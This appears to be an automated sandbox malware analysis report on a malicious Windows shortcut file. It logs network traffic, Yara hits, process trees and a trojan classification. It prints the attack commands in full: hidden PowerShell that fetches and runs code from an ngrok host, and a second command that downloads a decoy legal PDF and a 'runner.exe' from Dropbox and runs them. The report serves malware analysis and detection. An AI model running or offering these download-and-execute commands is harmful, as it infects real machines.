                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.6:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.6:49761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49791 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49899 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49962 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50027 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,27_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,27_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,28_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004D9C20 OpenClipboard,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,CloseClipboard,27_2_004D9C20
                      Source: 1718218388.exe, 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_0d1eca53-1
                      Source: 1718218388.exe, 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_6c351916-9
                      Source: Yara matchFile source: 28.3.1718218388.exe.3170000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.fontdrvhost.exe.4eb0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.fontdrvhost.exe.50d0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.fontdrvhost.exe.50d0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.3.1718218388.exe.3170000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.3.1718218388.exe.2f50000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000003.2725119697.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000003.2719658263.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1718218388.exe PID: 4236, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 8560, type: MEMORYSTR

                      System Summary

                      barindex
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeFile dump: DiskTuner.exe.27.dr 979567349Jump to dropped file
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\1718218388.exeJump to dropped file
                      Windows shortcut file (LNK) contains suspicious command line arguments
                      Source: taCCGTk8n1.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 33_2_000001B9A47B0AC8 NtAcceptConnectPort,NtAcceptConnectPort,33_2_000001B9A47B0AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 33_2_000001B9A47B15C0 NtAcceptConnectPort,33_2_000001B9A47B15C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 33_2_000001B9A47B1CF4 NtAcceptConnectPort,CloseHandle,33_2_000001B9A47B1CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 33_2_000001B9A47B1AA4 NtAcceptConnectPort,NtAcceptConnectPort,33_2_000001B9A47B1AA4
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34894D0A3_2_00007FFD34894D0A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34894CAA3_2_00007FFD34894CAA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348B261D16_2_00007FFD348B261D
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0040A02027_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0042D30027_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0043C3C027_2_0043C3C0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0042D39B27_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0042D4F927_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0041B4B027_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0042067027_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0041662127_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0045E87027_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0047DA0027_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0040ACD027_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_00429E1027_2_00429E10
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_00464EE027_2_00464EE0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007A81D228_3_007A81D2
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_0079C23128_3_0079C231
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_0079C40028_3_0079C400
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0040A02028_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0042D30028_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0042D39B28_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_004033A128_2_004033A1
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0042D4F928_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0041B4B028_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0042067028_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0041662128_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0045E87028_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0047DA0028_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_0040ACD028_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00429E1028_2_00429E10
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00464EE028_2_00464EE0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 33_2_000001B9A47B0C7033_2_000001B9A47B0C70
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: String function: 00435140 appears 66 times
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: String function: 004C9120 appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: String function: 0079CD90 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: String function: 00435350 appears 68 times
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 432
                      Source: 1718218388.exe, 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2753461974.0000000002509000.00000040.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2720989073.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2716880516.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                      Source: 1718218388.exe, 1718218388.exe, 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2753461974.0000000002509000.00000040.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2720989073.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2716880516.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                      Source: classification engineClassification label: mal100.troj.evad.winLNK@86/284@21/11
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004F9340 CoCreateInstance,27_2_004F9340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-f4ab12c4-c0a0-d82844-6f0e29b94802}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5688
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxymub3r.2q1.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\697963187.bat" "
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: taCCGTk8n1.lnkReversingLabs: Detection: 21%
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2088,i,4290676107445022345,3806009020306178634,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\697963187.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6808 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1225428425.pdf
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7388 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2108,i,10734861475087244222,18214222288503595443,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8888 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1718218388.exe "C:\Users\user\AppData\Local\Temp\1718218388.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Users\user\AppData\Local\Temp\1718218388.exe "C:\Users\user\AppData\Local\Temp\1718218388.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 432
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5688 -s 136
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6816 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\697963187.bat" "Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2088,i,4290676107445022345,3806009020306178634,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
